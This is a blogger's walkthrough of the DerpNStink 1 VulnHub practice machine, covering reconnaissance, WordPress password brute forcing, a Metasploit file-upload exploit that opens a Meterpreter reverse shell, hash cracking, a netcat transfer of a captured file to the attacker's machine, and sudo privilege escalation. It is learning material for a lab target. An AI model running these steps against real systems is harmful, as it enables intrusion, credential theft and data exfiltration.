Vulnhub DeRKnStiNK 1 walkthrough18 min read

So this is my first writeup on a VulnHub image and it is called DerpNStink: 1
I know that this is a really famous machine and why you should bother about a writeup that is out there hundreds of times.
The reason is that I wanted to try it and see if my methodology and approach is similar to more experienced researchers. This is one the first machines I tried.
Also this writeup is really verbose (-vV) because I am not only interested in the flags but also on the mindset that I have to acquire, so feel free to leave a comment if you believe I’m getting something wrong.


Mr. Derp and Uncle Stinky are two system administrators who are starting their own company, DerpNStink. Instead of hiring qualified professionals to build up their IT landscape, they decided to hack together their own system which is almost ready to go live…,221/

So as usual I fire up Kali Linux and the DeRKnStiNK on VirtualBox and start the very first scans for information gathering.

First things first I run netdiscover to find all the devices connected to my home network.

netdiscover -r

So derpnstink is running on!

Next I run nmap to find open ports and identify the services running on them.

nmap -sV -T4 -O -F --version-light

So 3 services running on ports 21,22 and 80.
Really common services (FTP,SSH and HTTP) with HTTP being the most interesting because it will probably host a web application.

FTP is using vsftpd on a slightly outdated version (Sep 2012 – vsftpd-3.0.2) were the latest version is (Jul 2015 – vsftpd-3.0.3.)

Searchsploit returned a few exploits for vsftpd but for older versions (2.X.X)

So, nothing really fancy is going to happening here. Maybe we could try to brute-force the service but we will leave that for now as a worst case scenario.

I also tried to connect as anonymous user with the Metasploit aauxiliary with no luck (auxiliary/scanner/ftp/anonymous).

Now lets focus on the SSH service.
The version is version that is running (6.6.1p1) is not vulnerable to any public exploits.
Again nothing interesting here and we won’t try to bruteforce it (I hope so).
If we try to connect with SSH we get a Permission denied (publickey)

ssh root@

Moving to the most interesting part, the HTTP and port 80.

Lets start with Knockpy that is a python sub-domain scanner again based on a common sub-domain wordlist.

No luck here. No sub-domains exist.

Nikto will help us get a better idea about the web server and the web apps hosted.

nikro -h

Lets continue with Dirb, one of my favorite tools that scans for common sub-directories based on a wordlist.
(The -r parameter means to scan but not recursively because we don’t want to get lost an scan for hours each and every folder that might exist. For now we are only interested in level-0 folders)

dirb -r

Really interesting stuff here.

Lets also run an auxiliary directory scanner from Metasploit that does the same job in case Dirb missed something.

use auxiliary/scanner/http/dir_scanner

Actually Dirb did a better job here because the auxiliary scanner missed a few files and directories.

So, lets finally open on the web browser.

An image of Mr.Derp and Uncle Stinky. No login , nothing interesting other than the cool visuals.

Lets view the pages source

Opening gives us useful information about system users, web directories and a local domain.

Opening is even more interesting as it gives as a hint!

<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --> 

So we add to our /etc/hosts the following line    derpnstink.local

Scrolling further down to the source code of the home page we find our first flag!
Well that was easy. 4 to go. usually is really informative cause it is used to hide stuff from the Search Engines that actually care about robots.txt files.

Anyway, deadend. Both on /php/ and /temporary/

Browsing dirb results also is a dead end.
/weblog/ … on the other hand opens a new page!

CaniHazURMoneyPlz!! lol

It clearly a WordPress blog. Interesting

http://derpnstink.local/weblog/wp-admin/ loads fine. That is convenient for us, not for derp though.

So it is time to use WPScan.
WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

These are the plugin options that we are currently interested.

--enumerate | -e [option(s)]        Enumeration.
  option :
    u        usernames from id 1 to 10
    u[10-20] usernames from id 10 to 20 (you must write [] chars)
    p        plugins
    vp       only vulnerable plugins
    ap       all plugins (can take a long time)
    tt       timthumbs
    t        themes
    vt       only vulnerable themes
    at       all themes (can take a long time)
    cb       Config backups
    dbe      Database exports
  Multiple values are allowed : "-e tt,p" will enumerate timthumbs and plugins
  If no option is supplied, the default is "vt,tt,u,vp"

We will try to enumerate vulnerable plugins,themes, users, the viral timthumb vulnerability and also config backups and DB exports.

wpscan --url http://derpnstink.local/weblog -e vt,tt,u,vp,cb,dbe

WPScan returned some naaasty staff about this WordPress installation

        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.1
          Sponsored by Sucuri -
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

[+] URL: http://derpnstink.local/weblog/
[+] Started: Fri Jan  4 14:19:12 2019

Interesting Finding(s):

[+] http://derpnstink.local/weblog/
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://derpnstink.local/weblog/xmlrpc.php
 | Found By: Headers (Passive Detection)
 | Confidence: 100%
 | Confirmed By:
 |  - Link Tag (Passive Detection), 30% confidence
 |  - Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  -
 |  -
 |  -
 |  -
 |  -

[+] http://derpnstink.local/weblog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 4.6.13 identified (Latest, released on 2018-12-13).
 | Detected By: Emoji Settings (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: '-release.min.js?ver=4.6.13'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://derpnstink.local/weblog/, Match: 'WordPress 4.6.13'

[+] WordPress theme in use: twentysixteen
 | Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 | Last Updated: 2018-12-19T00:00:00.000Z
 | Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 1.7
 | Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13
 | Style Name: Twenty Sixteen
 | Style URI:
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI:
 | Detected By: Css Style (Passive Detection)
 | Version: 1.3 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css?ver=4.6.13, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins
[+] Checking Plugin Versions

[i] Plugin(s) Identified:

[+] slideshow-gallery
 | Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 | Last Updated: 2018-11-15T11:14:00.000Z
 | [!] The version is out of date, the latest version is 1.6.9
 | Detected By: Urls In Homepage (Passive Detection)
 | [!] 4 vulnerabilities identified:
 | [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
 |     Fixed in: 1.4.7
 |     References:
 |      -
 |      -
 |      -
 |      -
 |      -
 |      -
 |      -
 | [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
 |     Fixed in:
 |     References:
 |      -
 |      -
 |      -
 | [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.5
 |     References:
 |      -
 |      -
 |      -
 | [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
 |     Fixed in: 1.6.6
 |     References:
 |      -
 |      -
 |      -
 |      -
 | Version: 1.4.6 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt

[+] Enumerating Vulnerable Themes
 Checking Known Locations - Time: 00:00:01 <=====================================================================> (288 / 288) 100.00% Time: 00:00:01
[+] Checking Theme Versions

[i] No themes Found.

[+] Enumerating Timthumbs
 Checking Known Locations - Time: 00:00:12 <===================================================================> (2573 / 2573) 100.00% Time: 00:00:12

[i] No Timthumbs Found.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:00 <========================================================================> (21 / 21) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports
 Checking DB Exports - Time: 00:00:00 <============================================================================> (36 / 36) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] unclestinky
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Finished: Fri Jan  4 14:19:46 2019
[+] Requests Done: 2921
[+] Cached Requests: 55
[+] Data Sent: 670.18 KB
[+] Data Received: 1.375 MB
[+] Memory used: 83.152 MB
[+] Elapsed time: 00:00:34

PHP version seems outdated with a few interesting CVEs but for now lets focus on the WordPress stuff.
WordPress version is also outdated but nothing exploitable.

WPScan found 4 vulnerable plugins!

The first is Slideshow Gallery < 1.4.7 Arbitrary File Upload that supports a Metasploit module with an excelent rank. Awesome!! The WordPress SlideShow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it's possible to upload any file type. The bad thing is that the exploit requires an authenticated user. Lets see if we can register a low privileged user. http://derpnstink.local/weblog/wp-login.php?action=register Anddd nop! Registration for users is disabled.

WPScan has already found users by the way (unclestinky,admin) so maybe we can try for common passwords on them.

So lets brute force them

But we need a wordlist.
Thankfully Kali has a few decent wordlists built-in on the following dir
I like gunzip rockyou.txt.gz
So lets unzip it

gunzip rockyou.txt.gz
wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/rockyou.txt --max-threads 25

Well I think maybe the rockyou.txt is an overkill
Even WPScan can’t calculate the needed time to exhaust the list.

Lets try a smaller one.

wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/fasttrack.txt

Aaaand success! That was crazy-easy. We could have found it even manually actually.

Lets login to WordPress with username: admin password: admin

Didn’t find anything useful other that the vulnerable plugin and many options on the WordPress menu where hidden even if we where connected as an administrator. Trying to view other pages like wp-admin/options-general.php returns an error “Sorry, you are not allowed to access this page.” Something is wrong here.

WPScan found another user “unclestinky” but didn’t crack the password.
Lets login to WordPress with username: unclestinky password: unclestinky
Wrong Password.

Lets use the admin user for the metasploit exploit.

use exploit/unix/webapp/wp_slideshowgallery_upload
set TARGETURI /weblog
set WP_USER admin
set WP_PASSWORD admin
check – The target appears to be vulnerable.


msf exploit(unix/webapp/wp_slideshowgallery_upload) > exploit
[*] Started reverse TCP handler on 
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file xtgeaywf.php
[*] Sending stage (38247 bytes) to
[*] Meterpreter session 2 opened ( -> at 2019-01-05 13:55:17 -0500
[+] Deleted xtgeaywf.php

So we got a meterpreter shell pretty easy as user www-data.

meterpreter > sysinfo
Computer    : DeRPnStiNK
OS          : Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686
Meterpreter : php/linux

Viewing the current directory files with ls returns a strange file named elidumfy.php file that contains a payload from another user that tried to hack derpnstinky! lol

meterpreter > ls
Listing: /var/www/html/weblog/wp-content/uploads/slideshow-gallery

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   4096    dir   2017-11-12 22:43:29 -0500  cache
100644/rw-r--r--  108987  fil   2017-11-12 22:45:12 -0500  derp.png
100644/rw-r--r--  1114    fil   2017-12-12 16:44:11 -0500  elidumfy.php

We continue to browse the directories with meterpreter.
Editing wp-config.php provides us valuable information to connect to the database.

Outsite /weblog directory we will try to visit the directories that we found at the beginning with dirb that returned error 403.

Editing info.php on /var/www/html/php returns interesting stuff

meterpreter > ls
Listing: /var/www/html/php

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  72    fil   2018-01-09 12:33:24 -0500  info.php

We could do some nasty staff with meterpreter but for now lets focus on phpMyAdmin.

After successful login with username: root password: mysql we can view all the databases.
Searching on table information_schema the string “flag” returned an interesting result in the wordpress database.

Searching again with “flag” returned us the 2nd flag of the machine in the wp_posts table.
2 to go

Lets view the registered users in wp_users table.

It would be nice if we could login as “unclestinky” to WordPress but as far as I know cracking a WordPress salting password won’t be that easy so why not just replace the hash with the “admin” user that we already know that is “admin”. Before we do that lets keep a backup of the salted hash in case we will need it later.

And now we can easily login with username: unclestinky password: admin

Nothing interesting though.
Back to meterpreter shell and browsing the filesystem

edit /etc/passwd

returns mrderp, stinky with bin/bash access

Continuing to /home directories /home/stinky and /home/derp and trying to view them unfortunately returns permission error as we are using the shell as user www-data.

At that point I must admit that I was kinda lost.
I am still really novice at this and especially on linux file system and where to look for interesting things or flags.
I have still 2 flags to go and I am sure the /home directory is full of secrets.

So port 21, 22, 80. I had some fun with port 80 but 21 and 22 are still really quiet.
usernames found: admin, mrderp, stinky
Tried manually to login with SSH but password logins are disabled. Also tried guessing FTP passwords with no luck.
Lost valuable time.

It is time to bruteforce the salted hash of wordpress user unclestinky and hope that he uses the same password on ssh or ftp.

john --wordlist=/usr/share/wordlists/rockyou.txt unclestinky_wp_hash.txt

And we finally have the password! wedgie57

Username on WordPress was “unclestinky” but we know from previous information gathering ( that for the Linux system is “stinky”

And we have successfully connected with ftp as “stinky”

200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Nov 12  2017 network-logs
drwxr-xr-x    3 1001     1001         4096 Nov 12  2017 ssh
-rwxr-xr-x    1 0        0              17 Nov 12  2017 test.txt
drwxr-xr-x    2 0        0            4096 Nov 12  2017 tmp
226 Directory send OK.

Switching to browser for better browsing.

In the file there are a few chatlogs from stinky and derp.
“12:07 stinky: im gonna packet capture so we can figure out whats going on”
Stinky mentions about a packet capture file so we might need to keep that info in mind as a hint.
We will probably have to analyze a .pcap file.

Not so well hidden in the following directory, luckily for us we found a private RSA key.


We create a file with the RSA key on the following directory ~/.ssh/id_rsa and then we try to login.

ssh -i key.txt stinky@

chmod 700 key.txt

And we are in as stinky@

We browse the directories

And we got the 3rd flag!

Also in Documents folder a derpissues.pcap is waiting to be wiresharked!

I didn’t know how to get the my local machine. I tried to move it to the /var/www dir to download it but I didn’t have the right permissions.
So after googling I found a solution using netcat.

We listen to port 31337 on kali for the file derpissues.pcap

nc -l -p 31337 > derpissues.pcap

And we send it as a gift from derp

nc 31337 < derpissues.pcap

We are probably interested in http post requests on wp-login.php so we filter the results accordingly.

Luckily for us the site is not using an SSL so passwords are send in plain-text.
No luck on that post request though because we already know that password.

And we got the password for derp!
username: mrderp
password: derpderpderpderpderpderpderp

ssh mrderp@

And we are in!

Browsing the directories for flag4.

The file /home/mrderp/Desktop/helpdesk.log contains a support ticket that contains too much text and a pastebin link:

mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

So I had to google ALOT to find out what that means.

Long story short, everything that runs on /home/mrderp/binaries/ with a name derpyXXX.XXX will run with full privileges.
Lets create a bash shell as

mkdir binaries
bash -i
sudo ./

And we are root!

Last flag was on /root/Desktop/flag.txt


mrDerp and UncleStinky got rooted

Don’t forget to change /var/www/html/temporary/index.html from “try harder!” to “I tried harder!!!”

So this was really fun and I learned a lot of new things.

Multiple vulnerabilities were found and were exploited in order to finally gain root access.
I must say that although it was kinda challenging for me, this situation is far away from any real world scenario. Still good practice to sharpen my skills and I hope that I can deal with more advanced machines in the near future.

2 thoughts on “Vulnhub DeRKnStiNK 1 walkthrough18 min read

Leave a Reply

Your email address will not be published. Required fields are marked *